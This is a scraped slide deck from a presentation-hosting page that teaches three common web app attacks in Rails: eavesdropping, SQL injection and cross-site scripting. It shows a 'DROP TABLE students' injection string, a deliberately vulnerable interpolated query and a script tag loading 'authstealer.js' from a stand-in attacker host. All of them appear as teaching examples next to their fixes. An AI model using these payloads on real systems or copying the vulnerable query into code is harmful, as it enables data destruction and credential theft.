Web App Security: Common Attacks and Preventive Measures

Security: Attacks & Countermeasures
http://xkcd.com/327/
Three Common Web App Attacks and
Countermeasures
 
I’ll unfold them one by one…
 
What potential attack
happens here?
What potential attack
happens here?
 
Eavesdropping,
packet sniffing,
man-in-the-middle
Example: Unsecured Sign-Up Page
 
How to prevent?
How to prevent?
 
Encrypt
communications
with SSL (HTTPS)
 
How to enable site-wide SSL in Rails
 
Also requires config on production server
E.g.: Signed certificate
 
Taken from https://www.railstutorial.org/book/ (3
rd
 Ed.) Listing 7.26
See also http://guides.rubyonrails.org/configuring.html#rails-general-configuration
Three Common Web App Attacks and
Countermeasures
 
Attack:
 Eavesdropping on network communications
Countermeasure:
 Encrypt communications with SSL
 
Why were the student records lost?
 
http://xkcd.com/327/
Why were the student records lost?
http://xkcd.com/327/
 
The name string “Robert'); DROP TABLE Students;--”
injected
 malicious code
But how can this happen?
 
Imagine controller that looks up
students by name
 
id = params[:id]
# => "
Robert
"
Student.where("name = '#{id}'")
Imagine controller that looks up
students by name
id = params[:id]
# => "
Robert
"
Student.where("name = '#{id}'")
 
What if…?
 
id = params[:id]
# => "
Robert'; DROP TABLE students;--
"
Student.where("name = '#{id}'")
What if…?
id = params[:id]
# => "
Robert'; DROP TABLE students;--
"
Student.where("name = '#{id}'")
 
How to prevent 
SQL injection
?
 
id = params[:id]
# => "
Robert'; DROP TABLE students;--
"
Student.where("name = '#{id}'")
How to prevent 
SQL injection
?
id = params[:id]
# => "
Robert'; DROP TABLE students;--
"
Student.where("name = '#{id}'")
 
Translation becomes…
 
id = params[:id]
# => "
Robert'; DROP TABLE students;--
"
Student.where("name = ?", id)
Translation becomes…
id = params[:id]
# => "
Robert'; DROP TABLE students;--
"
Student.where("name = ?", id)
Three Common Web App Attacks and
Countermeasures
 
Attack:
 Eavesdropping on network communications
Countermeasure:
 Encrypt communications with SSL
Attack:
 SQL injection
Countermeasure:
 Use escaped queries
 
Micropost Example: What if…?
 
Micropost Example: What if…?
Blah blah…
<script src="http://mallorysevilsite.com/authstealer.js">
 
User posts
 
Malicious script runs when feed loads!
Blah blah…
<script src="http://mallorysevilsite.com/authstealer.js">
 
How to prevent 
cross-site scripting (XSS)
?
How to prevent 
cross-site scripting (XSS)
?
 
Use Rails!
Hartl: “Rails automatically prevents the [XSS] problem by
escaping any content inserted into view templates.”
Three Common Web App Attacks and
Countermeasures
 
Attack:
 Eavesdropping on network communications
Countermeasure:
 Encrypt communications with SSL
Attack:
 SQL injection
Countermeasure:
 Use escaped queries
Attack:
 Cross-site scripting (another type of injection)
Countermeasure:
 Use Rails (escape text)
 
Although these attacks are common,
there are many more
(e.g., cross-site request forgery –
see Hartl Ch. 3)
 
CERT Top 10 Software Security Practices
 
1.
Validate input
2.
Heed compiler warnings
3.
Architect and design for security policies
4.
Keep it simple
5.
Default deny
6.
Adhere to the principle of least privilege
7.
Sanitize data sent to other software
8.
Practice defense in depth
9.
Use effective quality assurance techniques
10.
Adopt a software construction security standard
 
Taken from https://www.securecoding.cert.org/ (https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices)
 
For more attacks and countermeasures, see the
Rails Security Guide
http://guides.rubyonrails.org/security.html
 
Summary
 
Encrypting communication with SSL
SQL injection attacks
XSS attacks
CERT security practices
Slide Note
Embed
Share

Explore common web application attacks like eavesdropping, SQL injection, and packet sniffing, along with their countermeasures like encryption with SSL. Learn how to prevent data breaches and secure your online platforms effectively.


Uploaded on Jul 18, 2024 | 2 Views


Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

E N D

Presentation Transcript


  1. http://xkcd.com/327/ Security: Attacks & Countermeasures

  2. Three Common Web App Attacks and Countermeasures I ll unfold them one by one

  3. What potential attack happens here? Browser Ye Olde Internet Rails Router Controller Model View DB

  4. What potential attack happens here? Browser Eavesdropping, packet sniffing, man-in-the-middle Ye Olde Internet Rails Router Controller Model View DB

  5. Example: Unsecured Sign-Up Page Trivial for packet sniffer to steal

  6. Browser How to prevent? Ye Olde Internet Rails Router Controller Model View DB

  7. Browser How to prevent? Encrypt Ye Olde Internet communications with SSL (HTTPS) Rails Router Controller Model View DB

  8. How to enable site-wide SSL in Rails Also requires config on production server E.g.: Signed certificate Taken from https://www.railstutorial.org/book/ (3rd Ed.) Listing 7.26 See also http://guides.rubyonrails.org/configuring.html#rails-general-configuration

  9. Three Common Web App Attacks and Countermeasures Attack: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL

  10. Why were the student records lost? http://xkcd.com/327/

  11. Why were the student records lost? http://xkcd.com/327/ The name string Robert'); DROP TABLE Students;-- injected malicious code But how can this happen?

  12. Imagine controller that looks up students by name id = params[:id] # => "Robert" Student.where("name = '#{id}'")

  13. Imagine controller that looks up students by name id = params[:id] # => "Robert" Student.where("name = '#{id}'") Rails ORM translates to SELECT * FROM students WHERE name = 'Robert';

  14. What if? id = params[:id] # => "Robert'; DROP TABLE students;--" Student.where("name = '#{id}'")

  15. What if? id = params[:id] # => "Robert'; DROP TABLE students;--" Student.where("name = '#{id}'") SELECT * FROM students WHERE name = 'Robert'; DROP TABLE students;--';

  16. How to prevent SQL injection? id = params[:id] # => "Robert'; DROP TABLE students;--" Student.where("name = '#{id}'")

  17. How to prevent SQL injection? id = params[:id] # => "Robert'; DROP TABLE students;--" Student.where("name = '#{id}'") Write like this! Student.where("name = ?", id) Automatically escapes input

  18. Translation becomes id = params[:id] # => "Robert'; DROP TABLE students;--" Student.where("name = ?", id)

  19. Translation becomes id = params[:id] # => "Robert'; DROP TABLE students;--" Student.where("name = ?", id) SELECT * FROM students WHERE name = 'Robert\'\; DROP TABLE students\;\-\-';

  20. Three Common Web App Attacks and Countermeasures Attack: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL Attack: SQL injection Countermeasure: Use escaped queries

  21. Micropost Example: What if?

  22. Micropost Example: What if? Blah blah <script src="http://mallorysevilsite.com/authstealer.js">

  23. Malicious script runs when feed loads! Blah blah <script src="http://mallorysevilsite.com/authstealer.js">

  24. How to prevent cross-site scripting (XSS)?

  25. How to prevent cross-site scripting (XSS)? Use Rails! Hartl: Rails automatically prevents the [XSS] problem by escaping any content inserted into view templates. <script src="http://mallorysevilsite.com/authstealer.js"> ERB translates variable values to &lt;script src=&quot;http://mallorysevilsite.com/authstealer.js&quot;&gt;

  26. Three Common Web App Attacks and Countermeasures Attack: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL Attack: SQL injection Countermeasure: Use escaped queries Attack: Cross-site scripting (another type of injection) Countermeasure: Use Rails (escape text) Although these attacks are common, there are many more (e.g., cross-site request forgery see Hartl Ch. 3)

  27. CERT Top 10 Software Security Practices 1. Validate input 2. Heed compiler warnings 3. Architect and design for security policies 4. Keep it simple 5. Default deny 6. Adhere to the principle of least privilege 7. Sanitize data sent to other software 8. Practice defense in depth 9. Use effective quality assurance techniques 10.Adopt a software construction security standard Taken from https://www.securecoding.cert.org/ (https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices)

  28. For more attacks and countermeasures, see the Rails Security Guide http://guides.rubyonrails.org/security.html

  29. Summary Encrypting communication with SSL SQL injection attacks XSS attacks CERT security practices http://flic.kr/p/aCLor3

Related


More Related Content

giItT1WQy@!-/#giItT1WQy@!-/#giItT1WQy@!-/#giItT1WQy@!-/#